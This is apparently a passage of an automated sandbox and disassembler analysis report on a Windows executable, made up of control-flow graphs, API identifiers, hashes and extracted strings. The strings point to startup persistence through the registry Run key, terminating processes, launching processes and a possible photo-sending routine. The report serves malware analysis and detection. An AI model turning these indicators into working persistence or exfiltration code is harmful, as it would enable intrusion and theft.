                                                                                                                                                                          • Opcode ID: 67d35dfa7e85170c17c098ed7cd5c7520f7156fe35288b4de8b711d8b04b2b30
                                                                                                                                                                          • Instruction ID: 0f0ad74f4ac8883f872e749ba3d627260db7ce3da76e33c7607706ae0280deb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 67d35dfa7e85170c17c098ed7cd5c7520f7156fe35288b4de8b711d8b04b2b30
                                                                                                                                                                          • Instruction Fuzzy Hash: 19328062A1ABC281EA34EB18E4947EAE365FBC0744FC14136D68D476B9EF7CD584CB10

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 6656 7ff7abc13a10-7ff7abc13a62 RegOpenKeyExA 6657 7ff7abc13a68-7ff7abc13a8e 6656->6657 6658 7ff7abc13b02-7ff7abc13b0c 6656->6658 6661 7ff7abc13a90-7ff7abc13a97 6657->6661 6659 7ff7abc13b0e 6658->6659 6660 7ff7abc13b11-7ff7abc13b19 6658->6660 6659->6660 6662 7ff7abc13b1b 6660->6662 6663 7ff7abc13b1e-7ff7abc13b4b RegSetValueExA RegCloseKey 6660->6663 6661->6661 6664 7ff7abc13a99-7ff7abc13aac call 7ff7abc244a0 6661->6664 6662->6663 6665 7ff7abc13c50-7ff7abc13c6c 6663->6665 6666 7ff7abc13b51-7ff7abc13b66 6663->6666 6676 7ff7abc13aae-7ff7abc13ac0 6664->6676 6677 7ff7abc13ae0-7ff7abc13b01 call 7ff7abc42770 6664->6677 6670 7ff7abc13c73-7ff7abc13c7a 6665->6670 6668 7ff7abc13cd9-7ff7abc13cdf call 7ff7abc02410 6666->6668 6669 7ff7abc13b6c-7ff7abc13b71 6666->6669 6672 7ff7abc13b73 6669->6672 6673 7ff7abc13b76-7ff7abc13bd6 call 7ff7abc260e0 call 7ff7abc208c0 6669->6673 6670->6670 6675 7ff7abc13c7c-7ff7abc13c8f call 7ff7abc244a0 6670->6675 6672->6673 6695 7ff7abc13bd8-7ff7abc13bea 6673->6695 6696 7ff7abc13c0b-7ff7abc13c14 6673->6696 6675->6677 6691 7ff7abc13c95-7ff7abc13ca7 6675->6691 6681 7ff7abc13adb call 7ff7abc42790 6676->6681 6682 7ff7abc13ac2-7ff7abc13ad5 6676->6682 6681->6677 6682->6681 6686 7ff7abc13cd3-7ff7abc13cd8 call 7ff7abc4cd30 6682->6686 6686->6668 6691->6681 6694 7ff7abc13cad-7ff7abc13cc0 6691->6694 6694->6686 6697 7ff7abc13cc2 6694->6697 6699 7ff7abc13bec-7ff7abc13bff 6695->6699 6700 7ff7abc13c05-7ff7abc13c0a call 7ff7abc42790 6695->6700 6696->6677 6698 7ff7abc13c1a-7ff7abc13c2c 6696->6698 6697->6681 6698->6681 6701 7ff7abc13c32-7ff7abc13c45 6698->6701 6699->6700 6702 7ff7abc13cc7-7ff7abc13ccc call 7ff7abc4cd30 6699->6702 6700->6696 6705 7ff7abc13c4b 6701->6705 6706 7ff7abc13ccd-7ff7abc13cd2 call 7ff7abc4cd30 6701->6706 6702->6706 6705->6681 6706->6686
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenValue
                                                                                                                                                                          • String ID: ' to startup.$Error adding startup program: $Error opening registry key: $Software\Microsoft\Windows\CurrentVersion\Run$Successfully added '
                                                                                                                                                                          • API String ID: 31251203-1688488963
                                                                                                                                                                          • Opcode ID: 83d51618ce504506530fd22f02fb6bdbd732b92acf62a78b58852be582b103ea
                                                                                                                                                                          • Instruction ID: 254b87df625ef14edc10caab09ecddaf32fc7a78e70c39642bc62805afd6c871
                                                                                                                                                                          • Opcode Fuzzy Hash: 83d51618ce504506530fd22f02fb6bdbd732b92acf62a78b58852be582b103ea
                                                                                                                                                                          • Instruction Fuzzy Hash: FA719572B1AB4152EA10AB68E454B69A351FBC57F4F914331E6BD13AF9DF3CE4808710

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Enum$BaseCloseHandleModuleModulesNameOpenProcessesTerminate
                                                                                                                                                                          • String ID: Failed to enumerate processes$Failed to terminate process: $Successfully terminated process:
                                                                                                                                                                          • API String ID: 3307072288-2317428871
                                                                                                                                                                          • Opcode ID: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
                                                                                                                                                                          • Instruction ID: 10ca4bb10a0af8ad7bacb9366e729109516871c0d36b7e701a203cd11a3768b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
                                                                                                                                                                          • Instruction Fuzzy Hash: C251B4B1A0E68281EA60BB19F440AFAA361FFC47D0F815131D98D536B9EF3CE185C710

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 6752 7ff7abc3e7c8-7ff7abc3e811 call 7ff7abc3e770 6755 7ff7abc3e84e-7ff7abc3e851 6752->6755 6756 7ff7abc3e813 6752->6756 6758 7ff7abc3e857-7ff7abc3e871 call 7ff7abc3e770 6755->6758 6759 7ff7abc3e9bb-7ff7abc3e9c2 6755->6759 6757 7ff7abc3e816-7ff7abc3e83a SetFileInformationByHandle 6756->6757 6760 7ff7abc3e8b8-7ff7abc3e8c3 GetLastError 6757->6760 6761 7ff7abc3e83c-7ff7abc3e840 6757->6761 6758->6757 6776 7ff7abc3e873-7ff7abc3e882 6758->6776 6763 7ff7abc3e9c4-7ff7abc3e9c7 6759->6763 6764 7ff7abc3e9d3 6759->6764 6767 7ff7abc3e8db-7ff7abc3e8e5 call 7ff7abc3e03c 6760->6767 6768 7ff7abc3e8c5-7ff7abc3e8c8 6760->6768 6769 7ff7abc3e843-7ff7abc3e847 6761->6769 6763->6764 6765 7ff7abc3e9c9-7ff7abc3e9cc 6763->6765 6766 7ff7abc3e9d5 6764->6766 6765->6764 6771 7ff7abc3e9ce-7ff7abc3e9d1 6765->6771 6778 7ff7abc3e9dd-7ff7abc3e9e2 call 7ff7abc51774 6766->6778 6767->6761 6785 7ff7abc3e8eb-7ff7abc3e8ee 6767->6785 6768->6767 6772 7ff7abc3e8ca-7ff7abc3e8cd 6768->6772 6774 7ff7abc3e849-7ff7abc3e84c 6769->6774 6775 7ff7abc3e892-7ff7abc3e8b7 call 7ff7abc42770 6769->6775 6771->6764 6771->6766 6772->6767 6779 7ff7abc3e8cf 6772->6779 6781 7ff7abc3e884-7ff7abc3e88c CloseHandle 6774->6781 6776->6775 6776->6781 6788 7ff7abc3e9e3-7ff7abc3e9eb call 7ff7abc51774 6778->6788 6784 7ff7abc3e8d3-7ff7abc3e8d6 6779->6784 6781->6775 6781->6778 6784->6769 6785->6779 6787 7ff7abc3e8f0-7ff7abc3e8f3 6785->6787 6787->6779 6789 7ff7abc3e8f5-7ff7abc3e90c GetFileInformationByHandleEx 6787->6789 6791 7ff7abc3e90e 6789->6791 6792 7ff7abc3e93b-7ff7abc3e940 6789->6792 6796 7ff7abc3e912-7ff7abc3e918 GetLastError 6791->6796 6793 7ff7abc3e942-7ff7abc3e95c SetFileInformationByHandle 6792->6793 6794 7ff7abc3e9b5-7ff7abc3e9b9 6792->6794 6793->6791 6798 7ff7abc3e95e-7ff7abc3e968 call 7ff7abc3e03c 6793->6798 6799 7ff7abc3e99a-7ff7abc3e9a1 6794->6799 6797 7ff7abc3e91b-7ff7abc3e91f 6796->6797 6797->6775 6800 7ff7abc3e925-7ff7abc3e930 CloseHandle 6797->6800 6804 7ff7abc3e96a-7ff7abc3e971 6798->6804 6805 7ff7abc3e973-7ff7abc3e976 6798->6805 6799->6797 6800->6788 6802 7ff7abc3e936 6800->6802 6802->6775 6804->6797 6806 7ff7abc3e978-7ff7abc3e994 SetFileInformationByHandle 6805->6806 6807 7ff7abc3e9a6-7ff7abc3e9b0 GetLastError 6805->6807 6806->6796 6806->6799 6807->6784
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2221425841-0
                                                                                                                                                                          • Opcode ID: a2cf1fa02c6106464e38a00242262be6327711afdd9773003d5641332cd92145
                                                                                                                                                                          • Instruction ID: 26691e1a6dcf12b71b3d0a74dd37dc9125fc9d6bfc589cd1046a015d93071ac4
                                                                                                                                                                          • Opcode Fuzzy Hash: a2cf1fa02c6106464e38a00242262be6327711afdd9773003d5641332cd92145
                                                                                                                                                                          • Instruction Fuzzy Hash: FA51E631F0924389F768AB7D44109BDEBA0AF057A4FC60235CD2E56AF4DE28E4498771

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 6846 7ff7abc0a810-7ff7abc0a86e 6847 7ff7abc0a870 6846->6847 6848 7ff7abc0a873-7ff7abc0a8ce call 7ff7abc3e0b4 call 7ff7abc03ab0 call 7ff7abc217c0 6846->6848 6847->6848 6854 7ff7abc0a8d3-7ff7abc0a8d5 6848->6854 6855 7ff7abc0a8db-7ff7abc0a8e4 6854->6855 6856 7ff7abc0ac76-7ff7abc0ac89 call 7ff7abc04d50 6854->6856 6857 7ff7abc0a91d-7ff7abc0a933 6855->6857 6858 7ff7abc0a8e6-7ff7abc0a8fd 6855->6858 6865 7ff7abc0ac8a-7ff7abc0ac8f call 7ff7abc4cd30 6856->6865 6863 7ff7abc0a941-7ff7abc0a955 6857->6863 6864 7ff7abc0a935-7ff7abc0a939 6857->6864 6860 7ff7abc0a918 call 7ff7abc42790 6858->6860 6861 7ff7abc0a8ff-7ff7abc0a912 6858->6861 6860->6857 6861->6860 6861->6865 6867 7ff7abc0a957-7ff7abc0a95b 6863->6867 6868 7ff7abc0a963-7ff7abc0a978 6863->6868 6864->6863 6878 7ff7abc0ac90-7ff7abc0ac9f call 7ff7abc04d50 6865->6878 6867->6868 6870 7ff7abc0a97a-7ff7abc0a985 6868->6870 6871 7ff7abc0a9bf-7ff7abc0a9c7 6868->6871 6874 7ff7abc0a9b7 6870->6874 6875 7ff7abc0a987-7ff7abc0a9a2 6870->6875 6872 7ff7abc0a9d0-7ff7abc0a9db 6871->6872 6876 7ff7abc0a9e1-7ff7abc0aa08 call 7ff7abc055a0 6872->6876 6877 7ff7abc0abb5-7ff7abc0abc0 6872->6877 6874->6871 6875->6874 6890 7ff7abc0a9a4-7ff7abc0a9b5 6875->6890 6892 7ff7abc0aa18-7ff7abc0aa1b 6876->6892 6893 7ff7abc0aa0a-7ff7abc0aa12 6876->6893 6881 7ff7abc0ac02-7ff7abc0ac05 6877->6881 6882 7ff7abc0abc2-7ff7abc0abcd 6877->6882 6894 7ff7abc0aca0-7ff7abc0aca5 call 7ff7abc4cd30 6878->6894 6884 7ff7abc0ac07-7ff7abc0ac12 6881->6884 6885 7ff7abc0ac3f-7ff7abc0ac75 call 7ff7abc42770 6881->6885 6888 7ff7abc0abfa 6882->6888 6889 7ff7abc0abcf-7ff7abc0abea 6882->6889 6884->6885 6891 7ff7abc0ac14-7ff7abc0ac2e 6884->6891 6888->6881 6889->6888 6902 7ff7abc0abec-7ff7abc0abf4 6889->6902 6890->6871 6891->6885 6909 7ff7abc0ac30-7ff7abc0ac3e 6891->6909 6896 7ff7abc0ab9b-7ff7abc0abaa call 7ff7abc04f80 6892->6896 6897 7ff7abc0aa21-7ff7abc0aa29 6892->6897 6893->6878 6893->6892 6912 7ff7abc0aca6-7ff7abc0acab call 7ff7abc4cd30 6894->6912 6913 7ff7abc0acac-7ff7abc0acd2 call 7ff7abc04c60 6896->6913 6914 7ff7abc0abb0 6896->6914 6905 7ff7abc0aa2b 6897->6905 6906 7ff7abc0aa2e-7ff7abc0aa44 call 7ff7abc03c20 6897->6906 6902->6888 6905->6906 6918 7ff7abc0aa7e-7ff7abc0aac3 call 7ff7abc24160 call 7ff7abc03f60 6906->6918 6919 7ff7abc0aa46-7ff7abc0aa4d 6906->6919 6909->6885 6912->6913 6927 7ff7abc0acd7-7ff7abc0ace0 6913->6927 6928 7ff7abc0acd4 6913->6928 6914->6872 6940 7ff7abc0aaf7-7ff7abc0ab02 call 7ff7abc27d80 6918->6940 6941 7ff7abc0aac5-7ff7abc0aaf5 6918->6941 6924 7ff7abc0aa4f-7ff7abc0aa53 6919->6924 6925 7ff7abc0aa55-7ff7abc0aa5c 6919->6925 6924->6925 6926 7ff7abc0aa5e-7ff7abc0aa61 6924->6926 6925->6919 6925->6926 6926->6918 6930 7ff7abc0aa63-7ff7abc0aa6e 6926->6930 6931 7ff7abc0ad30-7ff7abc0ad41 6927->6931 6932 7ff7abc0ace2-7ff7abc0acf4 6927->6932 6928->6927 6930->6918 6934 7ff7abc0aa70-7ff7abc0aa74 6930->6934 6935 7ff7abc0acf7-7ff7abc0acfa 6932->6935 6934->6918 6937 7ff7abc0aa76-7ff7abc0aa7c 6934->6937 6938 7ff7abc0acfc-7ff7abc0ad13 call 7ff7abc69d90 6935->6938 6939 7ff7abc0ad15-7ff7abc0ad18 6935->6939 6937->6918 6937->6930 6938->6939 6951 7ff7abc0ad1f-7ff7abc0ad2f 6938->6951 6939->6931 6943 7ff7abc0ad1a-7ff7abc0ad1d 6939->6943 6944 7ff7abc0ab03-7ff7abc0ab0f 6940->6944 6941->6944 6943->6935 6948 7ff7abc0ab11-7ff7abc0ab23 6944->6948 6949 7ff7abc0ab43-7ff7abc0ab62 6944->6949 6952 7ff7abc0ab3e call 7ff7abc42790 6948->6952 6953 7ff7abc0ab25-7ff7abc0ab38 6948->6953 6949->6896 6950 7ff7abc0ab64-7ff7abc0ab7b 6949->6950 6955 7ff7abc0ab7d-7ff7abc0ab90 6950->6955 6956 7ff7abc0ab96 call 7ff7abc42790 6950->6956 6952->6949 6953->6894 6953->6952 6955->6912 6955->6956 6956->6896
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __std_fs_code_page
                                                                                                                                                                          • String ID: 1$await sendPhotoWithMessage($directory_iterator::directory_iterator$status
                                                                                                                                                                          • API String ID: 1686256323-4148110692
                                                                                                                                                                          • Opcode ID: bcff0d23a5865db57d679a0cc58bae59c6c93d7a4f14a3fd802930c83f765b10
                                                                                                                                                                          • Instruction ID: d25946e8cc09fc7721c241f91eba14101cdf63b1622d882416bd7da50479f866
                                                                                                                                                                          • Opcode Fuzzy Hash: bcff0d23a5865db57d679a0cc58bae59c6c93d7a4f14a3fd802930c83f765b10
                                                                                                                                                                          • Instruction Fuzzy Hash: 53E1C472A19BC181DA60AB29E54076EB361FB85FA0F968231EA9D077F5DF3CD481C710

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle_invalid_parameter_noinfo_noreturn$CreateErrorLastProcess
                                                                                                                                                                          • String ID: Failed to start process. Error: $Process started successfully.
                                                                                                                                                                          • API String ID: 1451358647-594763798
                                                                                                                                                                          • Opcode ID: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
                                                                                                                                                                          • Instruction ID: ec10598c3c21a8f3c2b1e40b838a9bea61550be76658a6ec09e63fe473787a1f
                                                                                                                                                                          • Opcode Fuzzy Hash: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
                                                                                                                                                                          • Instruction Fuzzy Hash: FE51B672E1978182EA00EB68E44466DA361FBC57A4F915336EAAC12AF9DF7CD0C1C710

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 7210 7ff7abc5ba50-7ff7abc5ba76 7211 7ff7abc5ba78-7ff7abc5ba8c call 7ff7abc51654 call 7ff7abc51674 7210->7211 7212 7ff7abc5ba91-7ff7abc5ba95 7210->7212 7228 7ff7abc5be82 7211->7228 7214 7ff7abc5be6b-7ff7abc5be77 call 7ff7abc51654 call 7ff7abc51674 7212->7214 7215 7ff7abc5ba9b-7ff7abc5baa2 7212->7215 7234 7ff7abc5be7d call 7ff7abc4cd10 7214->7234 7215->7214 7217 7ff7abc5baa8-7ff7abc5bad6 7215->7217 7217->7214 7220 7ff7abc5badc-7ff7abc5bae3 7217->7220 7223 7ff7abc5bafc-7ff7abc5baff 7220->7223 7224 7ff7abc5bae5-7ff7abc5baf7 call 7ff7abc51654 call 7ff7abc51674 7220->7224 7226 7ff7abc5be67-7ff7abc5be69 7223->7226 7227 7ff7abc5bb05-7ff7abc5bb0b 7223->7227 7224->7234 7231 7ff7abc5be85-7ff7abc5be9c 7226->7231 7227->7226 7232 7ff7abc5bb11-7ff7abc5bb14 7227->7232 7228->7231 7232->7224 7236 7ff7abc5bb16-7ff7abc5bb3b 7232->7236 7234->7228 7239 7ff7abc5bb6e-7ff7abc5bb75 7236->7239 7240 7ff7abc5bb3d-7ff7abc5bb3f 7236->7240 7241 7ff7abc5bb77-7ff7abc5bb9f call 7ff7abc5a168 call 7ff7abc58340 * 2 7239->7241 7242 7ff7abc5bb4a-7ff7abc5bb61 call 7ff7abc51654 call 7ff7abc51674 call 7ff7abc4cd10 7239->7242 7243 7ff7abc5bb66-7ff7abc5bb6c 7240->7243 7244 7ff7abc5bb41-7ff7abc5bb48 7240->7244 7271 7ff7abc5bbbc-7ff7abc5bbe7 call 7ff7abc5c110 7241->7271 7272 7ff7abc5bba1-7ff7abc5bbb7 call 7ff7abc51674 call 7ff7abc51654 7241->7272 7276 7ff7abc5bcf4 7242->7276 7247 7ff7abc5bbec-7ff7abc5bc03 7243->7247 7244->7242 7244->7243 7248 7ff7abc5bc7e-7ff7abc5bc88 call 7ff7abc649cc 7247->7248 7249 7ff7abc5bc05-7ff7abc5bc0d 7247->7249 7262 7ff7abc5bc8e-7ff7abc5bca3 7248->7262 7263 7ff7abc5bd12 7248->7263 7249->7248 7252 7ff7abc5bc0f-7ff7abc5bc11 7249->7252 7252->7248 7256 7ff7abc5bc13-7ff7abc5bc29 7252->7256 7256->7248 7260 7ff7abc5bc2b-7ff7abc5bc37 7256->7260 7260->7248 7265 7ff7abc5bc39-7ff7abc5bc3b 7260->7265 7262->7263 7268 7ff7abc5bca5-7ff7abc5bcb7 GetConsoleMode 7262->7268 7267 7ff7abc5bd17-7ff7abc5bd37 ReadFile 7263->7267 7265->7248 7270 7ff7abc5bc3d-7ff7abc5bc55 7265->7270 7273 7ff7abc5bd3d-7ff7abc5bd45 7267->7273 7274 7ff7abc5be31-7ff7abc5be3a GetLastError 7267->7274 7268->7263 7275 7ff7abc5bcb9-7ff7abc5bcc1 7268->7275 7270->7248 7280 7ff7abc5bc57-7ff7abc5bc63 7270->7280 7271->7247 7272->7276 7273->7274 7282 7ff7abc5bd4b 7273->7282 7277 7ff7abc5be3c-7ff7abc5be52 call 7ff7abc51674 call 7ff7abc51654 7274->7277 7278 7ff7abc5be57-7ff7abc5be5a 7274->7278 7275->7267 7284 7ff7abc5bcc3-7ff7abc5bce5 ReadConsoleW 7275->7284 7279 7ff7abc5bcf7-7ff7abc5bd01 call 7ff7abc58340 7276->7279 7277->7276 7290 7ff7abc5bced-7ff7abc5bcef call 7ff7abc515e8 7278->7290 7291 7ff7abc5be60-7ff7abc5be62 7278->7291 7279->7231 7280->7248 7289 7ff7abc5bc65-7ff7abc5bc67 7280->7289 7293 7ff7abc5bd52-7ff7abc5bd67 7282->7293 7285 7ff7abc5bce7 GetLastError 7284->7285 7286 7ff7abc5bd06-7ff7abc5bd10 7284->7286 7285->7290 7286->7293 7289->7248 7298 7ff7abc5bc69-7ff7abc5bc79 7289->7298 7290->7276 7291->7279 7293->7279 7300 7ff7abc5bd69-7ff7abc5bd74 7293->7300 7298->7248 7303 7ff7abc5bd9b-7ff7abc5bda3 7300->7303 7304 7ff7abc5bd76-7ff7abc5bd8f call 7ff7abc5b668 7300->7304 7305 7ff7abc5bda5-7ff7abc5bdb7 7303->7305 7306 7ff7abc5be1f-7ff7abc5be2c call 7ff7abc5b4a8 7303->7306 7309 7ff7abc5bd94-7ff7abc5bd96 7304->7309 7310 7ff7abc5bdb9 7305->7310 7311 7ff7abc5be12-7ff7abc5be1a 7305->7311 7306->7309 7309->7279 7314 7ff7abc5bdbe-7ff7abc5bdc5 7310->7314 7311->7279 7315 7ff7abc5bdc7-7ff7abc5bdcb 7314->7315 7316 7ff7abc5be01-7ff7abc5be0c 7314->7316 7317 7ff7abc5bdcd-7ff7abc5bdd4 7315->7317 7318 7ff7abc5bde7 7315->7318 7316->7311 7317->7318 7319 7ff7abc5bdd6-7ff7abc5bdda 7317->7319 7320 7ff7abc5bded-7ff7abc5bdfd 7318->7320 7319->7318 7321 7ff7abc5bddc-7ff7abc5bde5 7319->7321 7320->7314 7322 7ff7abc5bdff 7320->7322 7321->7320 7322->7311
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: f0a2823fdefb3b3155acf7249247a10fc584efcf3507e7f2d6af8965ae07d372
                                                                                                                                                                          • Instruction ID: 14e10dc632bf822b19ca944debf8afca232b5015a00b29de66e281a4b265f10c
                                                                                                                                                                          • Opcode Fuzzy Hash: f0a2823fdefb3b3155acf7249247a10fc584efcf3507e7f2d6af8965ae07d372
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AC1C66294968751E660AF1D9484ABDBF54FB41B80FDB0235EA4E033B6DF7EE8448720
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_fs_code_page
                                                                                                                                                                          • String ID: directory_iterator::directory_iterator$status
                                                                                                                                                                          • API String ID: 250480979-2525534277
                                                                                                                                                                          • Opcode ID: 0735d84b42465a8fb63d285e01de44861792c57b748eae9d61833a59fc5eb177
                                                                                                                                                                          • Instruction ID: 93c99ff8b8e8cf2e0749cb8707ecae00d2d6da0cb6dec27945ce729dd088ca60
                                                                                                                                                                          • Opcode Fuzzy Hash: 0735d84b42465a8fb63d285e01de44861792c57b748eae9d61833a59fc5eb177
                                                                                                                                                                          • Instruction Fuzzy Hash: B8A1A172F16B4186EB00EF39D4406ACA361FB84B98F558631DE4D57BB5DF38D5818350
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
